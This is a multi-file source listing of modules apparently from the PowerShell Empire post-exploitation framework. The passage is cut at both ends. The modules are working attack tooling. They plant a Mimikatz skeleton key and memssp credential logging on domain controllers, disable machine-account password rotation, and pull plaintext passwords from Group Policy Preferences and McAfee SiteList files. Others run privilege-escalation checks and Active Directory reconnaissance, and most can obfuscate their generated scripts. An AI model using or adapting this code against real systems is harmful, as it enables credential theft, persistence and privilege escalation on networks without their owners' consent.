80 |     Set-Content $ZipFileName ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
81 |     (dir $ZipFileName).IsReadOnly = $false
82 | 
83 |     $ZipFileName = resolve-path $ZipFileName
84 | 
85 |     $ZipFile = (new-object -com shell.application).NameSpace($ZipFileName)
86 |     $ZipFile.CopyHere($Directory.FullName)
87 |     "Folder $Folder zipped to $ZipFileName"
88 | }
89 | Invoke-ZipFolder"""
90 |         
91 |         for option,values in self.options.iteritems():
92 |             if option.lower() != "agent":
93 |                 if values['Value'] and values['Value'] != '':
94 |                     script += " -" + str(option) + " " + str(values['Value']) 
95 |         if obfuscate:
96 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
97 |         return script
98 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-DisableMachineAcctChange',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ('Disables the machine account for the target system '
13 |                             'from changing its password automatically.'),
14 | 
15 |             'Background' : False,
16 | 
17 |             'OutputExtension' : None,
18 |             
19 |             'NeedsAdmin' : True,
20 | 
21 |             'OpsecSafe' : True,
22 |             
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 |             
27 |             'Comments': []
28 |         }
29 | 
30 |         # any options needed by the module, settable during runtime
31 |         self.options = {
32 |             # format:
33 |             #   value_name : {description, required, default_value}
34 |             'Agent' : {
35 |                 'Description'   :   'Agent to run module on.',
36 |                 'Required'      :   True,
37 |                 'Value'         :   ''
38 |             },
39 |             'CleanUp' : {
40 |                 'Description'   :   'Switch. Re-enable machine password changes.',
41 |                 'Required'      :   False,
42 |                 'Value'         :   ''
43 |             }
44 |         }
45 | 
46 |         # save off a copy of the mainMenu object to access external functionality
47 |         #   like listeners/agent handlers/etc.
48 |         self.mainMenu = mainMenu
49 | 
50 |         for param in params:
51 |             # parameter format is [Name, Value]
52 |             option, value = param
53 |             if option in self.options:
54 |                 self.options[option]['Value'] = value
55 | 
56 | 
57 |     def generate(self, obfuscate=False, obfuscationCommand=""):
58 | 
59 |         cleanup = self.options['CleanUp']['Value']
60 | 
61 |         if cleanup.lower() == 'true':
62 |             script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 0; 'Machine account password change re-enabled.'"
63 |             if obfuscate:
64 |                 script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
65 |             return script
66 |         
67 |         script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 1; 'Machine account password change disabled.'"
68 |         if obfuscate:
69 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
70 |         return script
71 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/persistence/misc/memssp.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz memssp',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "to execute misc::memssp to log all authentication events "
14 |                             "to C:\\Windows\\System32\\mimisla.log."),
15 | 
16 |             'Background' : True,
17 | 
18 |             'OutputExtension' : None,
19 |             
20 |             'NeedsAdmin' : True,
21 | 
22 |             'OpsecSafe' : False,
23 | 
24 |             'Language' : 'powershell',
25 | 
26 |             'MinLanguageVersion' : '2',
27 |             
28 |             'Comments': [
29 |                 'http://clymb3r.wordpress.com/',
30 |                 'http://blog.gentilkiwi.com'
31 |             ]
32 |         }
33 | 
34 |         # any options needed by the module, settable during runtime
35 |         self.options = {
36 |             # format:
37 |             #   value_name : {description, required, default_value}
38 |             'Agent' : {
39 |                 'Description'   :   'Agent to run module on.',
40 |                 'Required'      :   True,
41 |                 'Value'         :   ''
42 |             }
43 |         }
44 | 
45 |         # save off a copy of the mainMenu object to access external functionality
46 |         #   like listeners/agent handlers/etc.
47 |         self.mainMenu = mainMenu
48 |         
49 |         for param in params:
50 |             # parameter format is [Name, Value]
51 |             option, value = param
52 |             if option in self.options:
53 |                 self.options[option]['Value'] = value
54 | 
55 | 
56 |     def generate(self, obfuscate=False, obfuscationCommand=""):
57 |         
58 |         # read in the common module source code
59 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
60 |         if obfuscate:
61 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
62 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
63 |         try:
64 |             f = open(moduleSource, 'r')
65 |         except:
66 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
67 |             return ""
68 | 
69 |         moduleCode = f.read()
70 |         f.close()
71 | 
72 |         script = moduleCode
73 | 
74 |         # build the custom command with whatever options we want
75 |         command = "misc::memssp"
76 | 
77 |         # base64 encode the command to pass to Invoke-Mimikatz
78 |         scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"
79 | 
80 |         scriptEnd += '"memssp installed, check C:\Windows\System32\mimisla.log for logon events."'
81 |         if obfuscate:
82 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
83 |         script += scriptEnd
84 |         return script
85 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/persistence/misc/skeleton_key.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz SkeletonKey',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "to execute misc::skeleton to implant a skeleton key w/ password 'mimikatz'. "
14 |                             "ONLY APPLICABLE ON DOMAIN CONTROLLERS!"),
15 | 
16 |             'Background' : True,
17 | 
18 |             'OutputExtension' : None,
19 |             
20 |             'NeedsAdmin' : True,
21 | 
22 |             'OpsecSafe' : True,
23 | 
24 |             'Language' : 'powershell',
25 | 
26 |             'MinLanguageVersion' : '2',
27 |             
28 |             'Comments': [
29 |                 'http://clymb3r.wordpress.com/',
30 |                 'http://blog.gentilkiwi.com'
31 |             ]
32 |         }
33 | 
34 |         # any options needed by the module, settable during runtime
35 |         self.options = {
36 |             # format:
37 |             #   value_name : {description, required, default_value}
38 |             'Agent' : {
39 |                 'Description'   :   'Agent to run module on.',
40 |                 'Required'      :   True,
41 |                 'Value'         :   ''
42 |             }
43 |         }
44 | 
45 |         # save off a copy of the mainMenu object to access external functionality
46 |         #   like listeners/agent handlers/etc.
47 |         self.mainMenu = mainMenu
48 |         
49 |         for param in params:
50 |             # parameter format is [Name, Value]
51 |             option, value = param
52 |             if option in self.options:
53 |                 self.options[option]['Value'] = value
54 | 
55 | 
56 |     def generate(self, obfuscate=False, obfuscationCommand=""):
57 |         
58 |         # read in the common module source code
59 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
60 |         if obfuscate:
61 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
62 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
63 |         try:
64 |             f = open(moduleSource, 'r')
65 |         except:
66 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
67 |             return ""
68 | 
69 |         moduleCode = f.read()
70 |         f.close()
71 | 
72 |         script = moduleCode
73 | 
74 |         # build the custom command with whatever options we want
75 |         command = "misc::skeleton"
76 | 
77 |         # base64 encode the command to pass to Invoke-Mimikatz
78 |         scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"
79 | 
80 |         scriptEnd += '"Skeleton key implanted. Use password \'mimikatz\' for access."'
81 |         if obfuscate:
82 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
83 |         script += scriptEnd
84 |         return script
85 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/privesc/gpp.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-GPPPassword',
 9 | 
10 |             'Author': ['@obscuresec'],
11 | 
12 |             'Description': ('Retrieves the plaintext password and other information for '
13 |                             'accounts pushed through Group Policy Preferences.'),
14 | 
15 |             'Background' : True,
16 | 
17 |             'OutputExtension' : None,
18 |             
19 |             'NeedsAdmin' : False,
20 | 
21 |             'OpsecSafe' : True,
22 |             
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 |             
27 |             'Comments': [
28 |                 'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1'
29 |             ]
30 |         }
31 | 
32 |         # any options needed by the module, settable during runtime
33 |         self.options = {
34 |             # format:
35 |             #   value_name : {description, required, default_value}
36 |             'Agent' : {
37 |                 'Description'   :   'Agent to run module on.',
38 |                 'Required'      :   True,
39 |                 'Value'         :   ''
40 |             }
41 |         }
42 |         
43 |         # save off a copy of the mainMenu object to access external functionality
44 |         #   like listeners/agent handlers/etc.
45 |         self.mainMenu = mainMenu
46 | 
47 |         for param in params:
48 |             # parameter format is [Name, Value]
49 |             option, value = param
50 |             if option in self.options:
51 |                 self.options[option]['Value'] = value
52 | 
53 | 
54 |     def generate(self, obfuscate=False, obfuscationCommand=""):
55 | 
56 |         # read in the common module source code
57 |         moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Get-GPPPassword.ps1"
58 |         if obfuscate:
59 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
60 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
61 |         try:
62 |             f = open(moduleSource, 'r')
63 |         except:
64 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
65 |             return ""
66 | 
67 |         moduleCode = f.read()
68 |         f.close()
69 | 
70 |         script = moduleCode
71 | 
72 |         scriptEnd = "Get-GPPPassword "
73 | 
74 |         for option,values in self.options.iteritems():
75 |             if option.lower() != "agent":
76 |                 if values['Value'] and values['Value'] != '':
77 |                     if values['Value'].lower() == "true":
78 |                         # if we're just adding a switch
79 |                         scriptEnd += " -" + str(option)
80 |                     else:
81 |                         scriptEnd += " -" + str(option) + " " + str(values['Value']) 
82 | 
83 |         scriptEnd += "| Out-String | %{$_ + \"`n\"};"
84 |         scriptEnd += "'Get-GPPPassword completed'"
85 |         if obfuscate:
86 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
87 |         script += scriptEnd
88 |         return script
89 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/privesc/mcafee_sitelist.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-SiteListPassword',
 9 | 
10 |             'Author': ['@harmj0y', '@funoverip'],
11 | 
12 |             'Description': ("Retrieves the plaintext passwords for found McAfee's SiteList.xml files."),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 'https://github.com/funoverip/mcafee-sitelist-pwd-decryption/'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             }
40 |         }
41 |         
42 |         # save off a copy of the mainMenu object to access external functionality
43 |         #   like listeners/agent handlers/etc.
44 |         self.mainMenu = mainMenu
45 | 
46 |         for param in params:
47 |             # parameter format is [Name, Value]
48 |             option, value = param
49 |             if option in self.options:
50 |                 self.options[option]['Value'] = value
51 | 
52 | 
53 |     def generate(self, obfuscate=False, obfuscationCommand=""):
54 | 
55 |         # read in the common module source code
56 |         moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Get-SiteListPassword.ps1"
57 |         if obfuscate:
58 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
59 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
60 |         try:
61 |             f = open(moduleSource, 'r')
62 |         except:
63 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
64 |             return ""
65 | 
66 |         moduleCode = f.read()
67 |         f.close()
68 | 
69 |         script = moduleCode
70 | 
71 |         scriptEnd = "Get-SiteListPassword "
72 | 
73 |         for option,values in self.options.iteritems():
74 |             if option.lower() != "agent":
75 |                 if values['Value'] and values['Value'] != '':
76 |                     if values['Value'].lower() == "true":
77 |                         # if we're just adding a switch
78 |                         scriptEnd += " -" + str(option)
79 |                     else:
80 |                         scriptEnd += " -" + str(option) + " " + str(values['Value']) 
81 | 
82 |         scriptEnd += "| Out-String | %{$_ + \"`n\"};"
83 |         scriptEnd += "'Get-SiteListPassword completed'"
84 |         if obfuscate:
85 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
86 |         script += scriptEnd
87 |         return script
88 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/privesc/powerup/allchecks.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-AllChecks',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ('Runs all current checks for Windows privesc vectors.'),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 'https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             }
40 |         }
41 | 
42 |         # save off a copy of the mainMenu object to access external functionality
43 |         #   like listeners/agent handlers/etc.
44 |         self.mainMenu = mainMenu
45 | 
46 |         for param in params:
47 |             # parameter format is [Name, Value]
48 |             option, value = param
49 |             if option in self.options:
50 |                 self.options[option]['Value'] = value
51 | 
52 | 
53 |     def generate(self, obfuscate=False, obfuscationCommand=""):
54 | 
55 |         moduleName = self.info["Name"]
56 |         
57 |         # read in the common powerup.ps1 module source code
58 |         moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
59 |         if obfuscate:
60 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
61 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
62 |         try:
63 |             f = open(moduleSource, 'r')
64 |         except:
65 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
66 |             return ""
67 | 
68 |         moduleCode = f.read()
69 |         f.close()
70 | 
71 |         # # get just the code needed for the specified function
72 |         # script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
73 |         script = moduleCode
74 | 
75 |         scriptEnd = ';' + moduleName + " "
76 | 
77 |         for option,values in self.options.iteritems():
78 |             if option.lower() != "agent":
79 |                 if values['Value'] and values['Value'] != '':
80 |                     if values['Value'].lower() == "true":
81 |                         # if we're just adding a switch
82 |                         scriptEnd += " -" + str(option)
83 |                     else:
84 |                         scriptEnd += " -" + str(option) + " " + str(values['Value']) 
85 | 
86 |         scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
87 |         if obfuscate:
88 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
89 |         script += scriptEnd
90 |         return script
91 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/host/get_pathacl.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-PathAcl',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ("Enumerates the ACL for a given file path."),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             },
40 |             'Path' : {
41 |                 'Description'   :   'The local/remote (UNC) path to enumerate the ACLs for.',
42 |                 'Required'      :   True,
43 |                 'Value'         :   ''
44 |             }
45 |         }
46 | 
47 |         # save off a copy of the mainMenu object to access external functionality
48 |         #   like listeners/agent handlers/etc.
49 |         self.mainMenu = mainMenu
50 | 
51 |         for param in params:
52 |             # parameter format is [Name, Value]
53 |             option, value = param
54 |             if option in self.options:
55 |                 self.options[option]['Value'] = value
56 | 
57 | 
58 |     def generate(self, obfuscate=False, obfuscationCommand=""):
59 |         
60 |         moduleName = self.info["Name"]
61 |         
62 |         # read in the common powerview.ps1 module source code
63 |         moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
64 | 
65 |         try:
66 |             f = open(moduleSource, 'r')
67 |         except:
68 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
69 |             return ""
70 | 
71 |         moduleCode = f.read()
72 |         f.close()
73 | 
74 |         # get just the code needed for the specified function
75 |         script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
76 | 
77 |         script += moduleName + " "
78 | 
79 |         for option,values in self.options.iteritems():
80 |             if option.lower() != "agent":
81 |                 if values['Value'] and values['Value'] != '':
82 |                     if values['Value'].lower() == "true":
83 |                         # if we're just adding a switch
84 |                         script += " -" + str(option)
85 |                     else:
86 |                         script += " -" + str(option) + " " + str(values['Value']) 
87 | 
88 |         script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
89 |         if obfuscate:
90 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
91 |         return script
92 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/host/get_proxy.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-Proxy',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ("Enumerates the proxy server and WPAD conents for the current user. Part of PowerView."),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             },
40 |             'ComputerName' : {
41 |                 'Description'   :   'The computername to enumerate proxy settings on.',
42 |                 'Required'      :   False,
43 |                 'Value'         :   ''
44 |             }
45 |         }
46 | 
47 |         # save off a copy of the mainMenu object to access external functionality
48 |         #   like listeners/agent handlers/etc.
49 |         self.mainMenu = mainMenu
50 | 
51 |         for param in params:
52 |             # parameter format is [Name, Value]
53 |             option, value = param
54 |             if option in self.options:
55 |                 self.options[option]['Value'] = value
56 | 
57 | 
58 |     def generate(self, obfuscate=False, obfuscationCommand=""):
59 |         
60 |         moduleName = self.info["Name"]
61 |         
62 |         # read in the common powerview.ps1 module source code
63 |         moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
64 | 
65 |         try:
66 |             f = open(moduleSource, 'r')
67 |         except:
68 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
69 |             return ""
70 | 
71 |         moduleCode = f.read()
72 |         f.close()
73 | 
74 |         # get just the code needed for the specified function
75 |         script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
76 | 
77 |         script += moduleName + " "
78 | 
79 |         for option,values in self.options.iteritems():
80 |             if option.lower() != "agent":
81 |                 if values['Value'] and values['Value'] != '':
82 |                     if values['Value'].lower() == "true":
83 |                         # if we're just adding a switch
84 |                         script += " -" + str(option)
85 |                     else:
86 |                         script += " -" + str(option) + " " + str(values['Value']) 
87 | 
88 |         script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
89 |         if obfuscate:
90 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
91 |         return script
92 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-NetForest',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ('Return information about a given forest, including the root domain and SID. Part of PowerView.'),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             },
40 |             'Forest' : {
41 |                 'Description'   :   'The forest name to query domain for, defaults to the current forest.',
42 |                 'Required'      :   False,
43 |                 'Value'         :   ''
44 |             }
45 |         }
46 | 
47 |         # save off a copy of the mainMenu object to access external functionality
48 |         #   like listeners/agent handlers/etc.
49 |         self.mainMenu = mainMenu
50 | 
51 |         for param in params:
52 |             # parameter format is [Name, Value]
53 |             option, value = param
54 |             if option in self.options:
55 |                 self.options[option]['Value'] = value
56 | 
57 | 
58 |     def generate(self, obfuscate=False, obfuscationCommand=""):
59 |         
60 |         moduleName = self.info["Name"]
61 |         
62 |         # read in the common powerview.ps1 module source code
63 |         moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
64 | 
65 |         try:
66 |             f = open(moduleSource, 'r')
67 |         except:
68 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
69 |             return ""
70 | 
71 |         moduleCode = f.read()
72 |         f.close()
73 | 
74 |         # get just the code needed for the specified function
75 |         script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
76 | 
77 |         script += moduleName + " "
78 | 
79 |         for option,values in self.options.iteritems():
80 |             if option.lower() != "agent":
81 |                 if values['Value'] and values['Value'] != '':
82 |                     if values['Value'].lower() == "true":
83 |                         # if we're just adding a switch
84 |                         script += " -" + str(option)
85 |                     else:
86 |                         script += " -" + str(option) + " " + str(values['Value']) 
87 | 
88 |         script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
89 |         if obfuscate:
90 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
91 |         return script
92 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-NetForestDomain',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ('Return all domains for a given forest. Part of PowerView.'),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             },
40 |             'Forest' : {
41 |                 'Description'   :   'The forest name to query domain for, defaults to the current forest.',
42 |                 'Required'      :   False,
43 |                 'Value'         :   ''
44 |             }
45 |         }
46 | 
47 |         # save off a copy of the mainMenu object to access external functionality
48 |         #   like listeners/agent handlers/etc.
49 |         self.mainMenu = mainMenu
50 | 
51 |         for param in params:
52 |             # parameter format is [Name, Value]
53 |             option, value = param
54 |             if option in self.options:
55 |                 self.options[option]['Value'] = value
56 | 
57 | 
58 |     def generate(self, obfuscate=False, obfuscationCommand=""):
59 |         
60 |         moduleName = self.info["Name"]
61 |         
62 |         # read in the common powerview.ps1 module source code
63 |         moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
64 | 
65 |         try:
66 |             f = open(moduleSource, 'r')
67 |         except:
68 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
69 |             return ""
70 | 
71 |         moduleCode = f.read()
72 |         f.close()
73 | 
74 |         # get just the code needed for the specified function
75 |         script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
76 | 
77 |         script += moduleName + " "
78 | 
79 |         for option,values in self.options.iteritems():
80 |             if option.lower() != "agent":
81 |                 if values['Value'] and values['Value'] != '':
82 |                     if values['Value'].lower() == "true":
83 |                         # if we're just adding a switch
84 |                         script += " -" + str(option)
85 |                     else:
86 |                         script += " -" + str(option) + " " + str(values['Value']) 
87 | 
88 |         script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
89 |         if obfuscate:
90 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
91 |         return script
92 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-NetLoggedon',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ('Execute the NetWkstaUserEnum Win32API call to query a given host for actively logged on users. Part of PowerView.'),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             },
40 |             'ComputerName' : {
41 |                 'Description'   :   'The hostname or IP to query for local group users.',
42 |                 'Required'      :   False,
43 |                 'Value'         :   'localhost'
44 |             }
45 |         }
46 | 
47 |         # save off a copy of the mainMenu object to access external functionality
48 |         #   like listeners/agent handlers/etc.
49 |         self.mainMenu = mainMenu
50 |         
51 |         for param in params:
52 |             # parameter format is [Name, Value]
53 |             option, value = param
54 |             if option in self.options:
55 |                 self.options[option]['Value'] = value
56 | 
57 | 
58 |     def generate(self, obfuscate=False, obfuscationCommand=""):
59 | 
60 |         moduleName = self.info["Name"]
61 |         
